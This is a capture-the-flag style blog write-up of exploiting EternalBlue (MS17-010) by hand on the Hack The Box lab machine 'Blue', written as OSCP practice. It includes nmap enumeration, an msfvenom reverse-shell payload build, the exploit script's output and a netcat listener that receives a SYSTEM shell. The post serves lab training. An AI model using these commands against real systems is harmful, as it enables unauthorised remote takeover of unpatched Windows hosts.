TJ_Null’s OSCP Prep – HTB – Blue

This Windows 7 box was vulnerable to Eternalblue or MS17-010. Using metasploit, it would be done in about 10 minutes. But since Im not using metasploit I did it manually. I had a lot of trouble getting the exploit to work because I required named pipes. There is a module in Metasploit which would enumerate it for you, but I didnt use it. However, I used helviojunior‘s script send_and_execute.py, which is a modified version of worawit’s zzz_exploit.py.


Enumeration

As always I’ll start with an NMAP scan.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/blue]
└─# nmap -sC -sV -p- --min-rate 10000 10.10.10.40 -oN nmpa.result                                                                                                                                                                     130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-07 16:40 EST
Warning: 10.10.10.40 giving up on port because retransmission cap hit (10).
Stats: 0:00:58 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 16:43 (0:01:26 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.039s latency).
Not shown: 65506 closed tcp ports (reset)
PORT      STATE    SERVICE        VERSION
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
308/tcp   filtered novastorbakcup
445/tcp   open     microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3432/tcp  filtered osdcp
3932/tcp  filtered dyn-site
4090/tcp  filtered omasgport
6847/tcp  filtered unknown
8986/tcp  filtered unknown
13231/tcp filtered unknown
14275/tcp filtered unknown
23124/tcp filtered unknown
23259/tcp filtered unknown
35388/tcp filtered unknown
41346/tcp filtered unknown
41964/tcp filtered unknown
44930/tcp filtered unknown
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49155/tcp open     msrpc          Microsoft Windows RPC
49156/tcp open     msrpc          Microsoft Windows RPC
49157/tcp open     msrpc          Microsoft Windows RPC
54785/tcp filtered unknown
55262/tcp filtered unknown
56807/tcp filtered unknown
61099/tcp filtered unknown
63728/tcp filtered unknown
64473/tcp filtered unknown
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-01-07T21:43:51
|_  start_date: 2022-01-07T21:39:56
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-01-07T21:43:49+00:00
|_clock-skew: mean: 1m53s, deviation: 0s, median: 1m52s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.10 seconds

The OS is Windows 7 Professional 7601 Service Pack 1.

There are many ports open, but since the machine name is Blue, I got a hint that this might be eternalblue vulnerability.

EternalBlue[5] is a cyberattack exploit developed by the U.S. National Security Agency (NSA).[6] It was leaked by the Shadow Brokers hacker group on April 14, 2017, one month after Microsoft released patches for the vulnerability. […]

EternalBlue exploits a vulnerability in Microsoft‘s implementation of the Server Message Block (SMB) protocol.

https://en.wikipedia.org/wiki/EternalBlue

To verify that the machine is actually vulnerable to eternalblue, I did some enumeration.

Eternalblue enum

└─# nmap --script vuln 10.10.10.40      
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-17 14:19 EST

[...]
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 137.69 seconds

And using checker.py in helviojuniors github to check if target is vulnerable. If it returns anything else other than 0xC0000205 (Which means STATUS_INSUFF_SERVER_RESOURCES) it will say that The target is patched.

┌──(root💀kali)-[/home/…/Desktop/HTB/blue/MS17-010]
└─# python2 checker.py 10.10.10.40                                                                                                                                                       1 ⨯
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED

Notice how Testing named pipes returns STATUS_ACCESS_DENIED. Thats because we havent used a username to authenticate. If I input anything into USERNAME, it will authenticate.

And if I run the script now.

┌──(root💀kali)-[/home/…/Desktop/HTB/blue/MS17-010]
└─# python2 checker.py 10.10.10.40 
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched

=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)

Alrite, now we have established that the target is vulnerable. Now its time to exploit the vulnerability.

Initial Access

Let’s first take a look at the script send_and_execute.py. What happens here is that it takes lfile, which is sys.argv[2]. Example (python2 send_and_execute.py 10.10.10.40 exploit.exe). exploit.exe would be the lfile that is going to be executed on the target machine.

It will execute it as a service using service_exec.

So first, lets add a USERNAME in the script. As we did with the checker.py script, I’ll just add useruser as USERNAME variable.

Then I’ll create a payload using msfvenom.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/blue]
└─# msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.17 LPORT=4444 > exploit.exe

Start a rlwrap netcat listener and execute the script.

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/blue]
└─# python2 send_and_execute.py 10.10.10.40 exploit.exe
Trying to connect to 10.10.10.40:445
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80045836c0
SESSION: 0xfffff8a001608660
FLINK: 0xfffff8a00866b088
InParam: 0xfffff8a00862d15c
MID: 0x2103
unexpected alignment, diff: 0x3d088
leak failed... try again
CONNECTION: 0xfffffa80045836c0
SESSION: 0xfffff8a001608660
FLINK: 0xfffff8a008677088
InParam: 0xfffff8a00867115c
MID: 0x2203
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Sending file 0P0GY6.exe...
Opening SVCManager on 10.10.10.40.....
Creating service dVJG.....
Starting service dVJG.....
The NETBIOS connection with the remote host timed out.
Removing service dVJG.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/blue]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

whoami
whoami
nt authority\system

C:\Windows\system32>

And just like that, we are NT AUTHORITY\SYSTEM. As you read from the output for send_and_execute.py, it opens SVCManager, creates a service, and start the service. If the service exist, it will remote it.

What I’ve learned

  • Scripts will usually not work right out of the box. I have to understand how the exploit and the scripts works, and sometimes modify it for it to work.
  • Even though the same vulnerability exist in XP and other OS, the way its exploited is different from each other. For example, in on the box Legacy the account used SMB was <blank>, meaning we didnt have to specify a username.

Similar Posts